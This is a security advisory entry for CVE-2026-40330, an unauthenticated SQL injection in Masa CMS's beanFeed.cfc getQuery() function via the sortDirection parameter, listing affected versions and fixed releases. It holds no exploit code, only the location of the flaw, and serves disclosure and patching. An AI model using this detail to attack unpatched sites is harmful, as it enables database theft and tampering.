PT-2026-37236 · Masacms · Masacms
Guustnieuwenhuis
·
Published
2026-05-05
·
Updated
2026-05-05
·
CVE-2026-40330
CVSS v4.0
9.3
Critical
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
Name of the Vulnerable Software and Affected Versions
Masa CMS versions 7.2.0 through 7.2.9
Masa CMS versions 7.3.0 through 7.3.14
Masa CMS versions 7.4.0 through 7.4.9
Masa CMS versions 7.5.0 through 7.5.2
Description
A SQL injection issue exists in the
beanFeed.cfc component within the getQuery() function. The sortDirection parameter is concatenated directly into SQL queries without sanitization or parameterization, allowing an unauthenticated remote attacker to extract sensitive information, modify or delete database records, or potentially achieve remote code execution on the database server.Recommendations
Update versions 7.2.0 through 7.2.9 to 7.2.10.
Update versions 7.3.0 through 7.3.14 to 7.3.15.
Update versions 7.4.0 through 7.4.9 to 7.4.10.
Update versions 7.5.0 through 7.5.2 to 7.5.3.
Restrict access to the
beanFeed.cfc component.
Avoid using the sortDirection parameter in the affected component until the issue is resolved.Fix
RCE
SQL injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Masacms